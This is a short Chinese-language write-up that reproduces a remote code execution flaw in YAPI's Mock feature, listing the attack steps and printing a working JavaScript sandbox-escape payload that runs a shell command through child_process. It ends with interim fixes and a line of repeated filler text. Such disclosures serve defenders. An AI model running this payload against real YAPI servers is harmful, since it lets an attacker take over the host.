YAPI远程代码执行0day漏洞复现

由于用户使用时未按照安全的方式对YAPI进行配置，攻击者可以使用 YAPI 的 Mock 功能在受影响的服务器上执行任意 javascript 代码，导致攻击者接管并控制服务器；目前该漏洞暂无补丁，处于0day状态。

注册或者爆破获取用户登录权限登陆系统：

添加项目：

添加接口

添加mock脚本：

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()

预览里访问接口

修复建议

该漏洞官方暂未发布补丁，请受影响的用户实时关注官网以获取最新信息。链接如下:

https://github.com/YMFE/yapi

临时解决方案

1.关闭YAPI注册功能

2.删除恶意账户

3.回滚服务器快照

4.同步删除恶意mock脚本以防止二次攻击

凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数